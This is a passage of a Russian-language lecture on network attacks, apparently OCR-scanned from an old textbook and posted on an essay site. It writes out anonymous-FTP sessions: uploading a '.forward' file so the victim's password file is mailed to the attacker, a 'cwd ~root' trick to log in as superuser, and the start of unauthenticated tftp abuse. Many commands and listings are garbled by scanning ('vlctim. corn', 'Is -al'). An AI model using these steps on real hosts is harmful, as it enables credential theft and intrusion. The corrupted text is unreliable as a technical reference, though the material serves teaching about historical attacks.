Лекция: PORT command successful.

150 ASCII data connection for /bin/is (192.192.192.1,1129) (0 bytes).

Total 5

Drwxr-xr-x4 101 1 512 Jun 20 1991. drwxr-xr-x 4 101 1512 Jun 20 1991. .

Drwxr-xr-x2 01 512 Jun 20 1991 bin drwxr-kr-x2 0 1512 Jun 20 1991 etc

Drwxr-xr-x 3 101 1 512 Aug 22 1991 pub

ASCII Transfer complete.

242 bytes received in 0.066 seconds (3.6 Kbytes/s)

ftp> put forward_SLicker_fl.le .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s)

ftp> quit evil % echo test I mail ftp@vlctim. corn

Теперь хакер может просто ждать, пока файл с паролями не будет выслан ему. Очевидно, что такая атака

(как и следующая) является типичной по сценарию 2. Рассматривая ftp, вспомним совсем старую ошибку:

% ftp -п

ftp> open victim, corn

Connected to victim, corn

Victim, corn FTP-server ready.

ftp> quote user ftp

Guest login ok, send ident as password.

ftp> quote cwd «root

Please login with USER and PASS.

ftp> quote pass ftp

Guest login ok, access restrictions apply.

ftp> Is -al /

Если этот прием сработал, то атакующий теперь вошел в систему как суперпользователь. Далее мы

рассмотрим более свежие <дыры> в ftp-демонах.

Использование tftp

До сих пор существует (но почти не используется, по крайней мере в глобальных сетях) программа, подобная

Ftpd, — tftpd. Этот демон не требует пароля для аутентификации. Если хост предоставлял tftp без ограничения

Доступа (обычно с помощью установок флагов безопасности в файле inetd.conf), то атакующий получал

еще рефераты
Еще работы по информатике